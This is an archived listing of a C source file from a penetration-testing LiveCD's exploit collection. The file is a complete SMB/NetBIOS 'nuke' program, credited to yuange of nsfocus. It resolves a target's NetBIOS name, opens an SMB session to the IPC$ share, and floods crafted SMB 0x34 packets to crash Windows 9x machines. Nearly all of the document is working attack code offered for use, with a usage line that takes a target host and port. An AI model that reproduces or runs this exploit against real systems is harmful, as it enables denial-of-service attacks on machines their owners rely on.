home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / local / wssbo.c < prev   
Encoding:
C/C++ Source or Header  |  2005-02-12  |  7.7 KB  |  301 lines
  1. #include <windows.h>
  2. #include <winsock.h>
  3. #include <stdio.h>
  4. #include <string.h>
  5.  
  6.  
  7. int main(int argc, char **argv)
  8. {
  9. char *server;
  10. char buff[1000];
  11. char buff2[1000];
  12. char buffgetname[]=
  13. {0x00,0x72,0x00,0x10,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,
  14. 0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
  15. 0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,
  16. 0x00,0x01};
  17. char name;
  18. char myname[0x200]={"hello"};
  19. char servername[]={"*SMBSERVER"};
  20. char buff3[]=
  21. {0x81,0,0,0x44,0x20,0x45,0x4f,0x45,0x42,0x45,0x4a,0x43,0x48,0x46,0x44,0x43,0x41,
  22. 0x46,0x48,0x45,0x50,0x46,0x43,0x45,0x4d,0x45,0x45,0x43,0x41,0x43,0x41,0x43,0x41,
  23. 0x43,0x41,0x43,0x41,00,0x20,0x45,0x48,0x46,0x46,0x45,0x46,0x46,0x44,0x46,0x45,
  24. 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,
  25. 0x43,0x41,0x43,0x41,0x41,0x41,00
  26. };
  27. char buff4[]={
  28. 0x0,0x0,0x0,0x9a,0xff,0x53,0x4d,0x42,0x72,00,00, 00, 00, 00, 00, 00, 00, 00,
  29. 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00 ,0x00,0x00,0x00,0x00,0x00,0x00,
  30. 0x00,0x77,0x00,0x02,0x50,0x43,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x20,0x50,
  31. 0x52,0x4f,0x47,0x52,0x41,0x4d,0x20,0x31,0x2e,0x30,0x00,0x02,0x4d,0x49,0x43,0x52,
  32. 0x4f,0x53,0x4f,0x46,0x54,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x53,0x20,0x33,
  33. 0x2e,0x30,0x00,0x02,0x44,0x4f,0x53,0x20,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x30,0x30,
  34. 0x32,0x00,0x02,0x44,0x4f,0x53,0x20,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x32,0x2e,0x31,
  35. 0x00,0x02,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x66,0x6f,0x72,0x20,0x57,0x6f,
  36. 0x72,0x6b,0x67,0x72,0x6f,0x75,0x70,0x73,0x20,0x33,0x2e,0x31,0x61,0x00,0x02,0x4e,
  37. 0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x00,0
  38. };
  39. int fileid_begin=0x600;
  40. int fileid_end=0x8ff;
  41. char smbchr[]={"SMBr"};
  42. char namereturn[]={0x82,0,0,0,0};
  43. char ipaddr[]={"192.168.1.1"};
  44. char ipaddrbak[]={"127.0.0.1"};
  45.  
  46. int port,gethost;
  47. int fd,fd2;
  48.  
  49. struct sockaddr_in s_in,s_in2,s_in3;
  50. struct linger time_out;
  51. struct hostent *he;
  52. int i,j,k;
  53. SOCKET d_ip;
  54. WSADATA wsaData;
  55. int result= WSAStartup(MAKEWORD(1, 1), &wsaData);
  56. if (result != 0) {
  57.         fprintf(stderr, "Your computer was not connected "
  58.             "to the Internet at the time that "
  59.             "this program was launched, or you "
  60.             "do not have a 32-bit "
  61.             "connection to the Internet.");
  62.         exit(1);
  63.     }
  64.  
  65.  
  66. if(argc <2)
  67. {
  68. WSACleanup( );
  69.     fprintf(stderr,"\n nuke win9x netbios .\n copy by yuange(yuange@nsfocus.com) 2000.4.1. \n
  70.                        wellcome to our homepage http://www.nsfocus.com .");
  71.     fprintf(stderr, "\n usage: %s <server> [port] \n", argv[0]);
  72. exit(1);
  73. }
  74. if(argc>=2)
  75. server = argv[1];
  76. else server=&ipaddr;
  77. d_ip = inet_addr(server);
  78.  
  79. if(d_ip==-1){
  80. he = gethostbyname(server);
  81. if(!he)
  82. {
  83. WSACleanup( );
  84.     printf("\n Can't get the ip of %s !\n",server);
  85. exit(1);
  86.     }
  87.     else memcpy(&d_ip, he->h_addr, 4);
  88.  
  89. }
  90. if(argc>2) port = atoi(argv[2]);
  91. else port=139;
  92.  
  93. fd = socket(AF_INET, SOCK_STREAM,0);
  94. i=8000;
  95. setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,&i,sizeof(i));
  96.  
  97. s_in.sin_family = AF_INET;
  98. s_in.sin_port = htons(port);
  99. s_in.sin_addr.s_addr = d_ip;
  100. printf("\n nuke ip: %s port %d",inet_ntoa(s_in.sin_addr),htons(s_in.sin_port));
  101.  
  102. if(!connect(fd, (struct sockaddr *)&s_in, sizeof(struct sockaddr_in))){
  103.  
  104. fd2 = socket(AF_INET, SOCK_DGRAM,0);
  105.     i=8000;
  106.     setsockopt(fd2,SOL_SOCKET,SO_RCVTIMEO,&i,sizeof(i));
  107.  
  108. s_in2.sin_family = AF_INET;
  109. s_in2.sin_port = htons(500);
  110. s_in2.sin_addr.s_addr =0;
  111.  
  112.     s_in3.sin_family = AF_INET;
  113. s_in3.sin_port = htons(137);
  114. s_in3.sin_addr.s_addr = d_ip;
  115.     bind(fd2,&s_in2, sizeof(struct sockaddr_in));
  116. for(k=0;k<10;++k){
  117.         printf("\n connect the smb %d times",k+1);
  118. sendto(fd2,buffgetname,0x32,0,&s_in3,sizeof(struct sockaddr_in));
  119.         i= sizeof(struct sockaddr_in);
  120.  
  121.         for(i=0;i<520;++i) buff2[i]=0;
  122.     j=recvfrom(fd2,buff2,500,0,&s_in3,&i);
  123.         i=0x39;
  124.         while(i<j){
  125.             if(buff2[i+0x0f]==0x20) {
  126.                 memcpy(servername,buff2+i,0x40);
  127.                 break;
  128.             }
  129.             i+=0x12;
  130.         }
  131.  
  132.         if(i>=j){
  133.         he=gethostbyaddr(&d_ip,sizeof(d_ip),PF_INET);
  134.     if(he) memcpy(servername,he->h_name,0x40);
  135.         }
  136.         printf("\n server computername: %s",servername);
  137.  
  138.     gethost=0;
  139.     for(i=0;i<16;++i){
  140.         name=servername[i] ;
  141.         if(name==0) gethost=1;
  142.         if(gethost==1) name=0x20;
  143.         buff3[2*i+5]= ( (name >> 4) & 0x000F ) + 'A';
  144.         buff3[2*i+6]= (name & 0x000F) + 'A';
  145.         }
  146.     buff3[37]=0;
  147.     gethost=0;
  148.     for(i=0;i<16;++i){
  149.             name=servername[i];
  150.             if(name==0) gethost=1;
  151.         if(gethost==1) name=0x20;
  152.         buff3[2*i+39]= ( (name >> 4) & 0x000F ) + 'A';
  153.         buff3[2*i+40]= (name & 0x000F) + 'A';
  154.  
  155.         }
  156.     buff3[71]=0;
  157.  
  158.     i=send(fd,buff3,0x48,0);
  159.     printf("\n send name packet %d bytes",i);
  160.     buff2[0]=0;
  161.     buff2[1]=0;
  162.     buff2[2]=0;
  163.     buff2[3]=0;
  164.     buff2[4]=0;
  165.     i=recv(fd,buff2,600,0);
  166.     printf("\n recv :");
  167.     if(i>0){
  168.             for(j=0;j<i;++j) {
  169.                 name=(char * )buff2[j];
  170.                 printf("%d ",name);
  171.             }
  172.         }
  173.         if(memcmp(buff2,namereturn,4)==0) k=100;
  174.     }
  175.  
  176.     closesocket(fd2);
  177.     if(k<100){
  178.     printf("\n Can't Negative! \n");
  179. closesocket(fd);
  180.     WSACleanup( );
  181. exit(1);
  182.     }
  183.     buff4[0]=0;
  184.     buff4[1]=0;
  185.     buff4[2]=0;
  186.     buff4[3]=0x9a;
  187.     buff4[4]=0xff;
  188.     buff4[5]='S';
  189.     buff4[6]='M';
  190.     buff4[7]='B';
  191.     buff4[8]=0x72;
  192.     buff4[0x25]=0x77;
  193.     j=send(fd,buff4,0x9e,0);
  194.         printf("\n send smb 0x72 packet %d bytes",j);
  195.  
  196.  
  197.         buff2[4]=0;
  198.         buff2[5]=0;
  199.         buff2[6]=0;
  200.         j=recv(fd,buff2,600,0);
  201.         printf("\n recv packet %d bytes:\n",j);
  202.         if(strcmp(buff2+5,smbchr)!=0){
  203.             printf("\n Can't login \\\\%s\\ipc$! \n",inet_ntoa(s_in.sin_addr));
  204.         closesocket(fd);
  205.         WSACleanup( );
  206.         exit(1);
  207.         }
  208.         name=buff2[0x27];
  209.         name&=0x01;
  210.         if(name==1){
  211.         printf("\n Only can nuke win9x system,can't nuke winnt system.\n");
  212.         closesocket(fd);
  213.         WSACleanup( );
  214.         exit(1);
  215.         }
  216.  
  217.         printf("\nBegin smb packet nuke !");
  218.  
  219. /* snd smb 0x73 packet */
  220. for(i=0;i<400;++i) buff[i]=0;
  221.     buff[0]=0;
  222.     buff[1]=0;
  223.     buff[2]=0;
  224.     buff[3]=0x9e+strlen(servername);
  225.     buff[4]=0xff;
  226.     buff[5]='S';
  227.     buff[6]='M';
  228.     buff[7]='B';
  229.     buff[8]=0x73;
  230.     buff[0x24]=0x0d;
  231.     buff[0x25]=0x75;
  232.     buff[0x27]=0x86;
  233.     buff[0x29]=0x68;
  234.     buff[0x2a]=0x0b;
  235.     buff[0x2b]=0x32;
  236.     buff[0x33]=0x18;
  237.     buff[0x3b]=0x05;
  238.     buff[0x3f]=0x49;
  239.     buff[0x59]=0x41;
  240.     buff[0x5a]=0x44;
  241.     buff[0x5b]=0x4d;
  242.     buff[0x5c]=0x49;
  243.     buff[0x5d]=0x4e;
  244.     buff[0x4e]=0x49;
  245.     buff[0x4f]=0x53;
  246.     buff[0x50]=0x54;
  247.     buff[0x51]=0x52;
  248.     buff[0x52]=0x41;
  249.     buff[0x53]=0x54;
  250.     buff[0x54]=0x4f;
  251.     buff[0x55]=0x52;
  252.  
  253.     buff[0x8a]=0x04;
  254.     buff[0x8b]=0xff;
  255.     buff[0x8f]=0x02;
  256.     buff[0x91]=1;
  257.  
  258.     buff[0x93]=13+strlen(servername);
  259.     buff[0x96]=0x5c;
  260.     buff[0x97]=0x5c;
  261.  
  262.         strcpy(buff+0x98,servername);
  263.         strcpy(buff+0x98+strlen(servername),"\\IPC$");
  264.         strcpy(buff+0x9e+strlen(servername),"IPC");
  265.  
  266.         j=send(fd,buff,0xa2+strlen(servername),0);
  267.         printf("\n send smb 0x73 packet %d bytes",j);
  268.  
  269.         j=recv(fd,buff2,600,0);
  270.         printf("\n recv packet %d bytes",j);
  271.  
  272.  
  273. /* send smb 0x34 packet */
  274.     for(i=0;i<400;++i) buff[i]=0;
  275.         buff[0]=0;
  276.     buff[1]=0;
  277.     buff[2]=0;
  278.     buff[3]=0x25;
  279.     buff[4]=0xff;
  280.     buff[5]='S';
  281.     buff[6]='M';
  282.     buff[7]='B';
  283.     buff[8]=0x34;
  284.     buff[0x24]=0x01;
  285.     for(i=fileid_begin;i<fileid_end;++i){
  286.         buff[0x25]=i%0x100;
  287.         buff[0x26]=i/0x100;
  288.         j=send(fd,buff,0x29,0);
  289.         printf("\n send smb 0x34 packet long %d",j);
  290.             printf(" FileId: %d",i);
  291.         }
  292. }
  293. else printf("\n connect err !\n");
  294.  
  295. closesocket(fd);
  296. WSACleanup( );
  297. return(0);
  298. }
  299.  
  300.  
  301.